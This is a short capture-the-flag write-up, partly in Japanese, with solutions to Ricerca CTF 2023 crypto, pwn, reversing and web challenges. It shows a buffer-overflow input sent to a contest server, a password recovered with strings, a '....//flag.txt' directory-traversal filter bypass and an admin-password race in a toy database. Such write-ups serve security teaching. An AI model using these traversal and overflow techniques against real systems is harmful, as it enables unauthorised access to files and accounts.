Ricerca CTF 2023 Writeup

# Ricerca CTF 2023 Writeup ![2023.ctf.ricsec.co.jp_challenges](https://hackmd.io/_uploads/H16ABbaEa.png) ## Crypto ### Revolving Letters > Who keeps spinning letters around? ```python def decrypt(secret, key): assert len(secret) <= len(key) result = "" for i in range(len(secret)): if secret[i] not in LOWER_ALPHABET: # Don't encode symbols and capital letters (e.g. "A", " ", "_", "!", "{", "}") result += secret[i] else: result += LOWER_ALPHABET[(LOWER_ALPHABET.index(secret[i]) + 26 - LOWER_ALPHABET.index(key[i])) % 26] return result ``` #### Flag `RicSec{great_you_can_do_anything!}` ## Pwn ### BOFSec > 100% authentic ``` $ nc bofsec.2023.ricercactf.com 9001 Name: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [+] Authentication successful. Flag: RicSec{U_und3rst4nd_th3_b4s1c_0f_buff3r_0v3rfl0w} ``` #### Flag `RicSec{U_und3rst4nd_th3_b4s1c_0f_buff3r_0v3rfl0w}` ## Reversing ### crackme > Can you crack the password? ``` $ strings crackme (省略) N1pp0n-Ich!_s3cuR3_p45$w0rD (省略) $ ./crackme Password: N1pp0n-Ich!_s3cuR3_p45$w0rD [+] Authenticated The flag is "RicSec{U_R_h1y0k0_cr4ck3r!}" ``` #### Flag `RicSec{U_R_h1y0k0_cr4ck3r!}` ## Web ### Cat Café > Which cat do you like the most? ```python filename = flask.request.args.get("f", "").replace("../", "") ``` パラメーターを `....//flag.txt` にします。 #### Flag `RicSec{directory_traversal_is_one_of_the_most_common_vulnearbilities}` ### tinyDB > It's a tiny tiny user database... ```typescript if (userDB.size > 10) { // Too many users, clear the database userDB.clear(); auth.username = "admin"; auth.password = getAdminPW(); userDB.set(auth, "admin"); auth.password = "*".repeat(auth.password.length); } ``` ユーザーの数が10を超えるとパスワードが `*******************************` になります。 ```typescript setTimeout(() => { // Admin password will be changed due to hacking detected :( if (auth.username === "admin" && auth.password !== getAdminPW()) { rollback(); } }, 2000 + 3000 * Math.random()); // no timing attack! ``` ロールバックされる前にフラグを取得します。 #### Flag `RicSec{j4v45cr1p7_15_7000000000000_d1f1cul7}`